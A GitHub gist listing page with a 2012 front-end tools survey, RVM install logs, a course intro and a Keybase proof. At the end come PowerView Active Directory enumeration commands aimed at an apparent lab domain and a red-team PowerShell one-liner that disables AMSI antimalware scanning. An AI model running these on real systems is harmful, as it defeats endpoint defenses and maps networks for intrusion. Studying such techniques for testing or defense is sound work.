Skip to content

Instantly share code, notes, and snippets.

@reybango
reybango / gist:3176293
Created July 25, 2012 13:50
Results: The essential tools, libs and frameworks you're using for front-end development survey.
Details:
This is incredibly unscientific and not meant to determine which tool is best. Just which tools seem to be in heavy use.
I'm doing this to help web developers stay on top of commonly used tools. Since change constantly but at least this gives
a snapshot of what's frequently used.
1031 Total Responses between 7/24/12 & 7/25/12
Details:
@reybango
reybango / gist:3182689
Created July 26, 2012 15:25
Results from the Main List
jQuery 916 89%
Modernizr 525 51%
Git 489 47%
HTML5 Boilerplate 439 43%
Sublime Text 2 442 43%
jQuery UI 421 41%
Bootstrap 346 34%
Sass 316 31%
JSFiddle 261 25%
Underscore 245 24%
@reybango
reybango / gist:3182707
Created July 26, 2012 15:27
Results from the "Other" Submissions
Stylus 15
Zurb Foundation 11
Vim 11
CodeKit 9
Mustache.js 7
Notepad++ 6
Coda 2 5
Textmate 5
EJS 4
JSHint 4
@reybango
reybango / gist:5204948
Created March 20, 2013 14:12
rvm get head
Reys-MacBook-Air:~ rey$ rvm get head
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 184 100 184 0 0 153 0 0:00:01 0:00:01 --:--:-- 189
100 11861 100 11861 0 0 5296 0 0:00:02 0:00:02 --:--:-- 22211
Downloading RVM from wayneeseguin branch master
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 124 100 124 0 0 280 0 --:--:-- --:--:-- --:--:-- 355
100 1629k 100 1629k 0 0 797k 0 0:00:02 0:00:02 --:--:-- 1498k
@reybango
reybango / gist:5204957
Created March 20, 2013 14:13
rvm install 1.9.3 --debug
Reys-MacBook-Air:~ rey$ rvm install 1.9.3 --debug
1.9.3 - install
Searching for binary rubies, this might take some time.
Remote file does not exist https://rvm.io/binaries/osx/10.8/x86_64/ruby-1.9.3-p392.tar.bz2
Remote file does not exist http://jruby.org.s3.amazonaws.com/downloads/ruby-1.9.3-p392.tar.bz2
Remote file does not exist http://binaries.rubini.us/osx/10.8/x86_64/ruby-1.9.3-p392.tar.bz2
rvm_remote_server_url3 not found
No remote file name found
No binary rubies available for: osx/10.8/x86_64/ruby-1.9.3-p392.
Continuing with compilation. Please read 'rvm mount' to get more information on binary rubies.
@reybango
reybango / gist:5205320
Created March 20, 2013 14:57
rvm install 1.9.3
Reys-MacBook-Air:~ rey$ rvm install 1.9.3
Searching for binary rubies, this might take some time.
No binary rubies available for: osx/10.8/x86_64/ruby-1.9.3-p392.
Continuing with compilation. Please read 'rvm mount' to get more information on binary rubies.
Installing requirements for osx/10.8/x86_64, might require sudo password
Skipping `brew update` make sure your formulas are up to date.
Skipping update of certificates in '/usr/local/etc/openssl/cert.pem'.
Installing Ruby from source to: /Users/rey/.rvm/rubies/ruby-1.9.3-p392, this may take a while depending on your cpu(s)...
ruby-1.9.3-p392 - #downloading ruby-1.9.3-p392, this may take a while depending on your connection...
ruby-1.9.3-p392 - #extracting ruby-1.9.3-p392 to /Users/rey/.rvm/src/ruby-1.9.3-p392
@reybango
reybango / gist:5999755
Last active December 19, 2015 18:38
Bloc.io Intro

Intro time!

Hey all, my name is Rey Bango. Note it's spelled with an "e" since it's short for Reinaldo. I always go with Rey since everyone has a hard time pronouncing my full name. :)

I'm a developer evangelist at Microsoft focused on web development and Internet Explorer. I've been developing professionally for about 24 years in a variety of systems both non-web & web-based. I cut my chops on the web using ColdFusion several years ago and then shifted to client-side development where I eventually became part of the jQuery project team.

My main interest in this course is to get back into server-side development using a modern stack so I can round out my skills again. And hopefully the client-side stuff will be a nice refresher for me.

I'm also the dad to 5 kids and have a loving wife. :)

Keybase proof

I hereby claim:

  • I am reybango on github.
  • I am reybango (https://keybase.io/reybango) on keybase.
  • I have a public key whose fingerprint is 3EB4 B311 8F42 7223 B9B0 EAB8 5E40 0313 D8F5 A86D

To claim this, I am signing this object:

# Get all user objects in the specific domain and only print the AD username
get-netuser -domain throwback.local -domaincontroller 10.200.14.117 | select samaccountname
# Get all computer objects in the specific domain
get-netcomputer -domain throwback.local -domaincontroller 10.200.14.117
# Get all domain trusts
Get-NetDomainTrust -domain throwback.local -domaincontroller 10.200.14.117
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# AMSI Bypass (Matt Graeber)
Normal Version
------------------------
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)